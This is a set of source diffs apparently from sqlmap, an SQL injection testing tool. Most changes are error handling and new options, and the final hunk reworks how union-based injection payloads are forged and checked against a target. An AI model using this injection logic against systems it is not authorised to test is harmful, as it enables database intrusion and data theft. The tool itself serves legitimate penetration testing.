"testSkip": "string",
"updateAll": "boolean",
},
@ -231,6 +232,7 @@ optDict = {
"cpuThrottle": "integer",
"forceDns": "boolean",
"identifyWaf": "boolean",
"skipWaf": "boolean",
"ignore401": "boolean",
"smokeTest": "boolean",
"liveTest": "boolean",

View File

@ -8,9 +8,11 @@ See the file 'doc/COPYING' for copying permission
import sqlite3
from extra.safe2bin.safe2bin import safechardecode
from lib.core.common import getSafeExString
from lib.core.common import unsafeSQLIdentificatorNaming
from lib.core.exception import SqlmapGenericException
from lib.core.exception import SqlmapValueException
from lib.core.settings import UNICODE_ENCODING
class Replication(object):
"""
@ -49,11 +51,16 @@ class Replication(object):
self.name = unsafeSQLIdentificatorNaming(name)
self.columns = columns
if create:
self.execute('DROP TABLE IF EXISTS "%s"' % self.name)
if not typeless:
self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s" %s' % (unsafeSQLIdentificatorNaming(colname), coltype) for colname, coltype in self.columns)))
else:
self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s"' % unsafeSQLIdentificatorNaming(colname) for colname in self.columns)))
try:
self.execute('DROP TABLE IF EXISTS "%s"' % self.name)
if not typeless:
self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s" %s' % (unsafeSQLIdentificatorNaming(colname), coltype) for colname, coltype in self.columns)))
else:
self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s"' % unsafeSQLIdentificatorNaming(colname) for colname in self.columns)))
except Exception, ex:
errMsg = "problem occurred ('%s') while initializing the sqlite database " % getSafeExString(ex, UNICODE_ENCODING)
errMsg += "located at '%s'" % self.parent.dbpath
raise SqlmapGenericException(errMsg)
def insert(self, values):
"""
@ -70,7 +77,7 @@ class Replication(object):
try:
self.parent.cursor.execute(sql, parameters)
except sqlite3.OperationalError, ex:
errMsg = "problem occurred ('%s') while accessing sqlite database " % unicode(ex)
errMsg = "problem occurred ('%s') while accessing sqlite database " % getSafeExString(ex, UNICODE_ENCODING)
errMsg += "located at '%s'. Please make sure that " % self.parent.dbpath
errMsg += "it's not used by some other program"
raise SqlmapGenericException(errMsg)

View File

@ -42,6 +42,9 @@ CONSTANT_RATIO = 0.9
# Ratio used in heuristic check for WAF/IDS/IPS protected targets
IDS_WAF_CHECK_RATIO = 0.5
# Timeout used in heuristic check for WAF/IDS/IPS protected targets
IDS_WAF_CHECK_TIMEOUT = 10
# Lower and upper values for match ratio in case of stable page
LOWER_RATIO_BOUND = 0.02
UPPER_RATIO_BOUND = 0.98
@ -219,6 +222,8 @@ USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")
REFERER_ALIASES = ("ref", "referer", "referrer")
HOST_ALIASES = ("host",)
HSQLDB_DEFAULT_SCHEMA = "PUBLIC"
# Names that can't be used to name files on Windows OS
WINDOWS_RESERVED_NAMES = ("CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9")

View File

@ -39,7 +39,6 @@ from lib.core.enums import POST_HINT
from lib.core.exception import SqlmapFilePathException
from lib.core.exception import SqlmapGenericException
from lib.core.exception import SqlmapMissingPrivileges
from lib.core.exception import SqlmapSyntaxException
from lib.core.exception import SqlmapSystemException
from lib.core.exception import SqlmapUserQuitException
from lib.core.option import _setDBMS

View File

@ -10,7 +10,7 @@ import threading
import time
import traceback
from thread import error as threadError
from thread import error as ThreadError
from lib.core.data import conf
from lib.core.data import kb
@ -89,9 +89,9 @@ def exceptionHandledFunction(threadFunction):
kb.threadContinue = False
kb.threadException = True
raise
except Exception, errMsg:
except Exception, ex:
# thread is just going to be silently killed
logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg))
logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message))
def setDaemon(thread):
# Reference: http://stackoverflow.com/questions/190010/daemon-threads-explanation
@ -145,8 +145,8 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
try:
thread.start()
except threadError, errMsg:
errMsg = "error occurred while starting new thread ('%s')" % errMsg
except ThreadError, ex:
errMsg = "error occurred while starting new thread ('%s')" % ex.message
logger.critical(errMsg)
break
@ -178,10 +178,10 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
if forwardException:
raise
except (SqlmapConnectionException, SqlmapValueException), errMsg:
except (SqlmapConnectionException, SqlmapValueException), ex:
print
kb.threadException = True
logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg))
logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message))
except:
from lib.core.common import unhandledExceptionMessage

View File

@ -30,7 +30,7 @@ def update():
if not os.path.exists(os.path.join(rootDir, ".git")):
errMsg = "not a git repository. Please checkout the 'sqlmapproject/sqlmap' repository "
errMsg += "from GitHub (e.g. git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev)"
errMsg += "from GitHub (e.g. 'git clone https://github.com/sqlmapproject/sqlmap.git sqlmap')"
logger.error(errMsg)
else:
infoMsg = "updating sqlmap to the latest development version from the "
@ -51,7 +51,12 @@ def update():
_ = lib.core.settings.REVISION = getRevisionNumber()
logger.info("%s the latest revision '%s'" % ("already at" if "Already" in stdout else "updated to", _))
else:
logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip())
if "Not a git repository" in stderr:
errMsg = "not a valid git repository. Please checkout the 'sqlmapproject/sqlmap' repository "
errMsg += "from GitHub (e.g. 'git clone https://github.com/sqlmapproject/sqlmap.git sqlmap')"
logger.error(errMsg)
else:
logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip())
if not success:
if IS_WIN:

View File

@ -36,14 +36,17 @@ from lib.core.shell import clearHistory
from lib.core.shell import loadHistory
from lib.core.shell import saveHistory
def cmdLineParser():
def cmdLineParser(argv=None):
"""
This function parses the command line parameters and arguments
"""
if not argv:
argv = sys.argv
checkSystemEncoding()
_ = getUnicode(os.path.basename(sys.argv[0]), encoding=sys.getfilesystemencoding())
_ = getUnicode(os.path.basename(argv[0]), encoding=sys.getfilesystemencoding())
usage = "%s%s [options]" % ("python " if not IS_WIN else "", \
"\"%s\"" % _ if " " in _ else _)
@ -141,8 +144,8 @@ def cmdLineParser():
help="HTTP authentication credentials "
"(name:password)")
request.add_option("--auth-private", dest="authPrivate",
help="HTTP authentication PEM private key file")
request.add_option("--auth-file", dest="authFile",
help="HTTP authentication PEM cert/private key file")
request.add_option("--ignore-401", dest="ignore401", action="store_true",
help="Ignore HTTP Error 401 (Unauthorized)")
@ -671,6 +674,9 @@ def cmdLineParser():
general.add_option("--test-filter", dest="testFilter",
help="Select tests by payloads and/or titles (e.g. ROW)")
general.add_option("--test-skip", dest="testSkip",
help="Skip tests by payloads and/or titles (e.g. BENCHMARK)")
general.add_option("--update", dest="updateAll",
action="store_true",
help="Update sqlmap")
@ -710,6 +716,10 @@ def cmdLineParser():
action="store_true",
help="Make a thorough testing for a WAF/IPS/IDS protection")
miscellaneous.add_option("--skip-waf", dest="skipWaf",
action="store_true",
help="Skip heuristic detection of WAF/IPS/IDS protection")
miscellaneous.add_option("--mobile", dest="mobile",
action="store_true",
help="Imitate smartphone through HTTP User-Agent header")
@ -756,6 +766,9 @@ def cmdLineParser():
parser.add_option("--force-dns", dest="forceDns", action="store_true",
help=SUPPRESS_HELP)
parser.add_option("--force-threads", dest="forceThreads", action="store_true",
help=SUPPRESS_HELP)
parser.add_option("--smoke-test", dest="smokeTest", action="store_true",
help=SUPPRESS_HELP)
@ -767,6 +780,9 @@ def cmdLineParser():
parser.add_option("--run-case", dest="runCase", help=SUPPRESS_HELP)
parser.add_option("--nnc5ed", dest="nnc5ed", action="store_true",
help=SUPPRESS_HELP) # temporary hidden switch :)
parser.add_option_group(target)
parser.add_option_group(request)
parser.add_option_group(optimization)
@ -802,14 +818,15 @@ def cmdLineParser():
option = parser.get_option("-h")
option.help = option.help.capitalize().replace("this help", "basic help")
argv = []
_ = []
prompt = False
advancedHelp = True
extraHeaders = []
for arg in sys.argv:
argv.append(getUnicode(arg, encoding=sys.getfilesystemencoding()))
for arg in argv:
_.append(getUnicode(arg, encoding=sys.getfilesystemencoding()))
argv = _
checkDeprecatedOptions(argv)
prompt = "--sqlmap-shell" in argv

View File

@ -6,6 +6,7 @@ See the file 'doc/COPYING' for copying permission
"""
from lib.core.common import checkFile
from lib.core.common import getSafeExString
from lib.core.common import getUnicode
from lib.core.common import openFile
from lib.core.common import unArrayizeValue
@ -67,7 +68,7 @@ def configFileParser(configFile):
config = UnicodeRawConfigParser()
config.readfp(configFP)
except Exception, ex:
errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % ex.message
errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % getSafeExString(ex)
raise SqlmapSyntaxException(errMsg)
if not config.has_section("Target"):

View File

@ -128,9 +128,16 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
count += 1
else:
break
if count:
seq1 = seq1[count:]
seq2 = seq2[count:]
try:
_seq1 = seq1[count:]
_seq2 = seq2[count:]
except MemoryError:
pass
else:
seq1 = _seq1
seq2 = _seq2
while True:
try:

View File

@ -5,6 +5,7 @@ Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import binascii
import compiler
import httplib
import json
@ -40,6 +41,7 @@ from lib.core.common import getCurrentThreadData
from lib.core.common import getHeader
from lib.core.common import getHostHeader
from lib.core.common import getRequestHeader
from lib.core.common import getSafeExString
from lib.core.common import getUnicode
from lib.core.common import logHTTPTraffic
from lib.core.common import pushValue
@ -142,6 +144,7 @@ class Connect(object):
warnMsg += "(e.g. '--flush-session --technique=BEUS') or try to "
warnMsg += "lower the value of option '--time-sec' (e.g. '--time-sec=2')"
singleTimeWarnMessage(warnMsg)
elif kb.originalPage is None:
if conf.tor:
warnMsg = "please make sure that you have "
@ -158,13 +161,12 @@ class Connect(object):
warnMsg += "with the switch '--random-agent' turned on "
warnMsg += "and/or proxy switches ('--ignore-proxy', '--proxy',...)"
singleTimeWarnMessage(warnMsg)
elif conf.threads > 1:
warnMsg = "if the problem persists please try to lower "
warnMsg += "the number of used threads (option '--threads')"
singleTimeWarnMessage(warnMsg)
time.sleep(1)
kwargs['retrying'] = True
return Connect._getPageProxy(**kwargs)
@ -183,7 +185,11 @@ class Connect(object):
kb.pageCompress = False
else:
while True:
_ = conn.read(MAX_CONNECTION_CHUNK_SIZE)
if not conn:
break
else:
_ = conn.read(MAX_CONNECTION_CHUNK_SIZE)
if len(_) == MAX_CONNECTION_CHUNK_SIZE:
warnMsg = "large response detected. This could take a while"
singleTimeWarnMessage(warnMsg)
@ -433,6 +439,11 @@ class Connect(object):
logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg)
if conf.cj:
for cookie in conf.cj:
if cookie.value is None:
cookie.value = ""
conn = urllib2.urlopen(req)
if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and (conf.authType or "").lower() == AUTH_TYPE.BASIC.lower():
@ -497,22 +508,22 @@ class Connect(object):
if hasattr(conn.fp, '_sock'):
conn.fp._sock.close()
conn.close()
except Exception, msg:
warnMsg = "problem occurred during connection closing ('%s')" % msg
except Exception, ex:
warnMsg = "problem occurred during connection closing ('%s')" % getSafeExString(ex)
logger.warn(warnMsg)
except urllib2.HTTPError, e:
except urllib2.HTTPError, ex:
page = None
responseHeaders = None
try:
page = e.read() if not skipRead else None
responseHeaders = e.info()
responseHeaders[URI_HTTP_HEADER] = e.geturl()
page = ex.read() if not skipRead else None
responseHeaders = ex.info()
responseHeaders[URI_HTTP_HEADER] = ex.geturl()
page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE))
except socket.timeout:
warnMsg = "connection timed out while trying "
warnMsg += "to get error page information (%d)" % e.code
warnMsg += "to get error page information (%d)" % ex.code
logger.warn(warnMsg)
return None, None, None
except KeyboardInterrupt:
@ -522,13 +533,13 @@ class Connect(object):
finally:
page = page if isinstance(page, unicode) else getUnicode(page)
code = e.code
code = ex.code
kb.originalCode = kb.originalCode or code
threadData.lastHTTPError = (threadData.lastRequestUID, code)
kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1
status = getUnicode(e.msg)
status = getUnicode(ex.msg)
responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status)
if responseHeaders:
@ -545,11 +556,11 @@ class Connect(object):
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)
if e.code == httplib.UNAUTHORIZED and not conf.ignore401:
if ex.code == httplib.UNAUTHORIZED and not conf.ignore401:
errMsg = "not authorized, try to provide right HTTP "
errMsg += "authentication type and valid credentials (%d)" % code
raise SqlmapConnectionException(errMsg)
elif e.code == httplib.NOT_FOUND:
elif ex.code == httplib.NOT_FOUND:
if raise404:
errMsg = "page not found (%d)" % code
raise SqlmapConnectionException(errMsg)
@ -557,11 +568,11 @@ class Connect(object):
debugMsg = "page not found (%d)" % code
singleTimeLogMessage(debugMsg, logging.DEBUG)
processResponse(page, responseHeaders)
elif e.code == httplib.GATEWAY_TIMEOUT:
elif ex.code == httplib.GATEWAY_TIMEOUT:
if ignoreTimeout:
return None, None, None
else:
warnMsg = "unable to connect to the target URL (%d - %s)" % (e.code, httplib.responses[e.code])
warnMsg = "unable to connect to the target URL (%d - %s)" % (ex.code, httplib.responses[ex.code])
if threadData.retriesCount < conf.retries and not kb.threadException:
warnMsg += ". sqlmap is going to retry the request"
logger.critical(warnMsg)
@ -575,7 +586,7 @@ class Connect(object):
debugMsg = "got HTTP error code: %d (%s)" % (code, status)
logger.debug(debugMsg)
except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, ProxyError, SqlmapCompressionException, WebSocketException), e:
except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, binascii.Error, ProxyError, SqlmapCompressionException, WebSocketException):
tbMsg = traceback.format_exc()
if "no host given" in tbMsg:
@ -619,7 +630,11 @@ class Connect(object):
return None, None, None
elif threadData.retriesCount < conf.retries and not kb.threadException:
warnMsg += ". sqlmap is going to retry the request"
logger.critical(warnMsg)
if not retrying:
warnMsg += "(s)"
logger.critical(warnMsg)
else:
logger.debug(warnMsg)
return Connect._retryProxy(**kwargs)
elif kb.testMode:
logger.critical(warnMsg)
@ -628,7 +643,7 @@ class Connect(object):
raise SqlmapConnectionException(warnMsg)
finally:
if not isinstance(page, unicode):
if isinstance(page, basestring) and not isinstance(page, unicode):
if HTTP_HEADER.CONTENT_TYPE in (responseHeaders or {}) and not re.search(TEXT_CONTENT_TYPE_REGEX, responseHeaders[HTTP_HEADER.CONTENT_TYPE]):
page = unicode(page, errors="ignore")
else:
@ -718,7 +733,7 @@ class Connect(object):
payload = function(payload=payload, headers=auxHeaders)
except Exception, ex:
errMsg = "error occurred while running tamper "
errMsg += "function '%s' ('%s')" % (function.func_name, ex)
errMsg += "function '%s' ('%s')" % (function.func_name, getSafeExString(ex))
raise SqlmapGenericException(errMsg)
if not isinstance(payload, basestring):
@ -834,7 +849,7 @@ class Connect(object):
if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""):
token = page
if not token and any(_.name == conf.csrfToken for _ in conf.cj):
if not token and conf.cj and any(_.name == conf.csrfToken for _ in conf.cj):
for _ in conf.cj:
if _.name == conf.csrfToken:
token = _.value
@ -889,7 +904,7 @@ class Connect(object):
if conf.evalCode:
delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER
variables = {"uri": uri, "lastPage": threadData.lastPage}
variables = {"uri": uri, "lastPage": threadData.lastPage, "_locals": locals()}
originals = {}
keywords = keyword.kwlist
@ -1051,9 +1066,9 @@ class Connect(object):
_, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ))
if headers:
if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and HTTP_HEADER.CONTENT_LENGTH in headers:
if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and headers.get(HTTP_HEADER.CONTENT_LENGTH):
pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH])
elif kb.nullConnection == NULLCONNECTION.RANGE and HTTP_HEADER.CONTENT_RANGE in headers:
elif kb.nullConnection == NULLCONNECTION.RANGE and headers.get(HTTP_HEADER.CONTENT_RANGE):
pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:])
finally:
kb.pageCompress = popValue()

View File

@ -9,6 +9,7 @@ import httplib
import socket
import urllib2
from lib.core.common import getSafeExString
from lib.core.data import kb
from lib.core.data import logger
from lib.core.exception import SqlmapConnectionException
@ -55,9 +56,9 @@ class HTTPSConnection(httplib.HTTPSConnection):
break
else:
sock.close()
except (ssl.SSLError, socket.error, httplib.BadStatusLine), errMsg:
except (ssl.SSLError, socket.error, httplib.BadStatusLine), ex:
self._tunnel_host = None
logger.debug("SSL connection error occurred ('%s')" % errMsg)
logger.debug("SSL connection error occurred ('%s')" % getSafeExString(ex))
# Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext
# https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni
@ -75,9 +76,9 @@ class HTTPSConnection(httplib.HTTPSConnection):
break
else:
sock.close()
except (ssl.SSLError, socket.error, httplib.BadStatusLine), errMsg:
except (ssl.SSLError, socket.error, httplib.BadStatusLine), ex:
self._tunnel_host = None
logger.debug("SSL connection error occurred ('%s')" % errMsg)
logger.debug("SSL connection error occurred ('%s')" % getSafeExString(ex))
if not success:
raise SqlmapConnectionException("can't establish SSL connection")

View File

@ -39,6 +39,7 @@ from lib.core.enums import DBMS
from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD
from lib.core.exception import SqlmapConnectionException
from lib.core.exception import SqlmapDataException
from lib.core.exception import SqlmapNotVulnerableException
from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import MAX_TECHNIQUES_PER_VALUE
@ -78,7 +79,7 @@ def _goInference(payload, expression, charsetType=None, firstChar=None, lastChar
timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED))
if not (timeBasedCompare and kb.dnsTest):
if (conf.eta or conf.threads > 1) and Backend.getIdentifiedDbms() and not re.search("(COUNT|LTRIM)\(", expression, re.I) and not timeBasedCompare:
if (conf.eta or conf.threads > 1) and Backend.getIdentifiedDbms() and not re.search("(COUNT|LTRIM)\(", expression, re.I) and not (timeBasedCompare and not conf.forceThreads):
if field and re.search("\ASELECT\s+DISTINCT\((.+?)\)\s+FROM", expression, re.I):
expression = "SELECT %s FROM (%s)" % (field, expression)
@ -262,9 +263,14 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char
return None
try:
for num in xrange(startLimit, stopLimit):
output = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump)
outputs.append(output)
try:
for num in xrange(startLimit, stopLimit):
output = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump)
outputs.append(output)
except OverflowError:
errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit)
errMsg += "with switch '--fresh-queries'"
raise SqlmapDataException(errMsg)
except KeyboardInterrupt:
print

View File

@ -11,12 +11,13 @@ import urllib2
from lib.core.data import conf
class HTTPSPKIAuthHandler(urllib2.HTTPSHandler):
def __init__(self, key_file):
def __init__(self, auth_file):
urllib2.HTTPSHandler.__init__(self)
self.key_file = key_file
self.auth_file = auth_file
def https_open(self, req):
return self.do_open(self.getConnection, req)
def getConnection(self, host, timeout=None):
return httplib.HTTPSConnection(host, key_file=self.key_file, timeout=conf.timeout)
# Reference: https://docs.python.org/2/library/ssl.html#ssl.SSLContext.load_cert_chain
return httplib.HTTPSConnection(host, cert_file=self.auth_file, key_file=self.auth_file, timeout=conf.timeout)

View File

@ -30,6 +30,7 @@ from lib.core.settings import MAX_SINGLE_URL_REDIRECTIONS
from lib.core.settings import MAX_TOTAL_REDIRECTIONS
from lib.core.threads import getCurrentThreadData
from lib.request.basic import decodePage
from lib.request.basic import parseResponse
class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
def _get_header_redirect(self, headers):
@ -118,6 +119,8 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
result = fp
if redurl and kb.redirectChoice == REDIRECTION.YES:
parseResponse(content, headers)
req.headers[HTTP_HEADER.HOST] = getHostHeader(redurl)
if headers and HTTP_HEADER.SET_COOKIE in headers:
req.headers[HTTP_HEADER.COOKIE] = headers[HTTP_HEADER.SET_COOKIE].split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)[0]

View File

@ -18,6 +18,7 @@ from lib.core.common import readInput
from lib.core.data import conf
from lib.core.data import logger
from lib.core.data import paths
from lib.core.exception import SqlmapDataException
class ICMPsh:
"""
@ -41,6 +42,9 @@ class ICMPsh:
while not address:
address = readInput(message, default=self.remoteIP)
if conf.batch and not address:
raise SqlmapDataException("remote host address is missing")
return address
def _selectLhost(self):
@ -53,6 +57,9 @@ class ICMPsh:
while not address:
address = readInput(message, default=self.localIP)
if conf.batch and not address:
raise SqlmapDataException("local host address is missing")
return address
def _prepareIngredients(self, encode=True):

View File

@ -258,7 +258,7 @@ class UDF:
else:
logger.warn("invalid value, only digits are allowed")
for x in range(0, udfCount):
for x in xrange(0, udfCount):
while True:
msg = "what is the name of the UDF number %d? " % (x + 1)
udfName = readInput(msg)
@ -293,7 +293,7 @@ class UDF:
else:
logger.warn("invalid value, only digits >= 0 are allowed")
for y in range(0, parCount):
for y in xrange(0, parCount):
msg = "what is the data-type of input parameter "
msg += "number %d? (default: %s) " % ((y + 1), defaultType)

View File

@ -146,12 +146,12 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
if showEta:
progress = ProgressBar(maxValue=length)
if timeBasedCompare and conf.threads > 1:
if timeBasedCompare and conf.threads > 1 and not conf.forceThreads:
warnMsg = "multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically"
singleTimeWarnMessage(warnMsg)
if numThreads > 1:
if not timeBasedCompare:
if not timeBasedCompare or conf.forceThreads:
debugMsg = "starting %d thread%s" % (numThreads, ("s" if numThreads > 1 else ""))
logger.debug(debugMsg)
else:
@ -232,8 +232,10 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
# Used for gradual expanding into unicode charspace
shiftTable = [2, 2, 3, 3, 5, 4]
if CHAR_INFERENCE_MARK in payload and ord('\n') in charTbl:
charTbl.remove(ord('\n'))
if "'%s'" % CHAR_INFERENCE_MARK in payload:
for char in ('\n', '\r'):
if ord(char) in charTbl:
charTbl.remove(ord(char))
if not charTbl:
return None
@ -597,8 +599,9 @@ def queryOutputLength(expression, payload):
infoMsg = "retrieving the length of query output"
logger.info(infoMsg)
lengthExprUnescaped = agent.forgeQueryOutputLength(expression)
start = time.time()
lengthExprUnescaped = agent.forgeQueryOutputLength(expression)
count, length = bisection(payload, lengthExprUnescaped, charsetType=CHARSET_TYPE.DIGITS)
debugMsg = "performed %d queries in %.2f seconds" % (count, calculateDeltaSeconds(start))

View File

@ -28,9 +28,9 @@ from lib.core.enums import HASHDB_KEYS
from lib.core.enums import PAYLOAD
from lib.core.exception import SqlmapDataException
from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.settings import METADB_SUFFIX
from lib.core.settings import BRUTE_COLUMN_EXISTS_TEMPLATE
from lib.core.settings import BRUTE_TABLE_EXISTS_TEMPLATE
from lib.core.settings import METADB_SUFFIX
from lib.core.threads import getCurrentThreadData
from lib.core.threads import runThreads
from lib.request import inject
@ -102,7 +102,7 @@ def tableExists(tableFile, regex=None):
break
if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
fullTableName = "%s%s%s" % (conf.db, '..' if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) else '.', table)
fullTableName = "%s.%s" % (conf.db, table)
else:
fullTableName = table

View File

@ -165,74 +165,78 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO
# Unbiased approach for searching appropriate usable column
random.shuffle(positions)
# For each column of the table (# of NULL) perform a request using
# the UNION ALL SELECT statement to test it the target URL is
# affected by an exploitable union SQL injection vulnerability
for position in positions:
# Prepare expression with delimiters
randQuery = randomStr(UNION_MIN_RESPONSE_CHARS)
phrase = "%s%s%s".lower() % (kb.chars.start, randQuery, kb.chars.stop)
randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
randQueryUnescaped = unescaper.escape(randQueryProcessed)
for charCount in (UNION_MIN_RESPONSE_CHARS << 2, UNION_MIN_RESPONSE_CHARS):
if vector:
break
# Forge the union SQL injection request
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# For each column of the table (# of NULL) perform a request using
# the UNION ALL SELECT statement to test it the target URL is
# affected by an exploitable union SQL injection vulnerability
for position in positions:
# Prepare expression with delimiters
randQuery = randomStr(charCount)
phrase = "%s%s%s".lower() % (kb.chars.start, randQuery, kb.chars.stop)
randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
randQueryUnescaped = unescaper.escape(randQueryProcessed)
# Perform the request
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \
removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
payload, True) or "")
# Forge the union SQL injection request
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
if content and phrase in content:
validPayload = payload
kb.unionDuplicates = len(re.findall(phrase, content, re.I)) > 1
vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, False)
# Perform the request
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \
removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
payload, True) or "")
if where == PAYLOAD.WHERE.ORIGINAL:
# Prepare expression with delimiters
randQuery2 = randomStr(UNION_MIN_RESPONSE_CHARS)
phrase2 = "%s%s%s".lower() % (kb.chars.start, randQuery2, kb.chars.stop)
randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
randQueryUnescaped2 = unescaper.escape(randQueryProcessed2)
if content and phrase in content:
validPayload = payload
kb.unionDuplicates = len(re.findall(phrase, content, re.I)) > 1
vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, False)
# Confirm that it is a full union SQL injection
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
if where == PAYLOAD.WHERE.ORIGINAL:
# Prepare expression with delimiters
randQuery2 = randomStr(charCount)
phrase2 = "%s%s%s".lower() % (kb.chars.start, randQuery2, kb.chars.stop)
randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
randQueryUnescaped2 = unescaper.escape(randQueryProcessed2)
# Perform the request
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "")
if not all(_ in content for _ in (phrase, phrase2)):
vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True)
elif not kb.unionDuplicates:
fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr())
# Check for limited row output
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable)
# Confirm that it is a full union SQL injection
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \
removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
payload, True) or "")
if content.count(phrase) > 0 and content.count(phrase) < LIMITED_ROWS_TEST_NUMBER:
warnMsg = "output with limited number of rows detected. Switching to partial mode"
logger.warn(warnMsg)
vector = (position, count, comment, prefix, suffix, kb.uChar, PAYLOAD.WHERE.NEGATIVE, kb.unionDuplicates, False)
content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "")
unionErrorCase = kb.errorIsNone and wasLastResponseDBMSError()
if not all(_ in content for _ in (phrase, phrase2)):
vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True)
elif not kb.unionDuplicates:
